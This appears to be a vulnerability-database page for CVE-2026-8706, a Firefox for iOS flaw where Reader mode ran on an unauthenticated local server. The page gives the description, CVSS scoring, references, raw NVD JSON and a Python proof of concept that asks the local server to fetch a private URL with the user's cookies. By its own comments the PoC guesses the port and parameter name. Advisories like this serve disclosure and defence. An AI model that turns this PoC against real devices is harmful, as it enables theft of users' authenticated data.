CVE-2026-8706

Description

Firefox for iOS hosted Reader mode on an unauthenticated local web server, allowing another application on the same device to request arbitrary URLs and receive the response rendered with the signed-in user's cookies. This vulnerability was fixed in Firefox for iOS 151.0.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Firefox for iOS < 151.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Conceptual Proof of Concept (PoC) for CVE-2026-8706
# This script simulates a malicious app on the same device interacting
# with the vulnerable local web server of Firefox for iOS.

# The actual local port and endpoint would need to be determined via analysis.
# Assuming the reader mode endpoint listens on localhost.
TARGET_LOCALHOST = "http://127.0.0.1:8080/reader-mode"

# The target URL that the attacker wants to fetch using the victim's session.
# This could be a private API endpoint or a user profile page.
SENSITIVE_TARGET_URL = "https://example.com/private/user-data"

def exploit():
    print(f"[*] Attempting to connect to local Firefox server: {TARGET_LOCALHOST}")
    
    try:
        # Construct the payload. The parameter name 'url' is hypothetical.
        params = {
            "url": SENSITIVE_TARGET_URL
        }
        
        # Send the request to the unauthenticated local server
        response = requests.get(TARGET_LOCALHOST, params=params, timeout=5)
        
        if response.status_code == 200:
            print("[+] Request successful!")
            print("[+] Leaked content (rendered by Firefox with user cookies):")
            print("-" * 40)
            print(response.text)
            print("-" * 40)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.ConnectionError:
        print("[!] Could not connect to the local server. Firefox may not be running or the port is different.")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8706
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8706
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8706/
[4] VulDB https://vuldb.com/cve/CVE-2026-8706
[5] https://bugzilla.mozilla.org/show_bug.cgi?id=2036618
[6] https://www.mozilla.org/security/advisories/mfsa2026-49/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8706", "sourceIdentifier": "[email protected]", "published": "2026-05-19T16:16:22.580", "lastModified": "2026-05-19T18:16:32.350", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Firefox for iOS hosted Reader mode on an unauthenticated local web server, allowing another application on the same device to request arbitrary URLs and receive the response rendered with the signed-in user's cookies. This vulnerability was fixed in Firefox for iOS 151.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2036618", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-49/", "source": "[email protected]"}]}}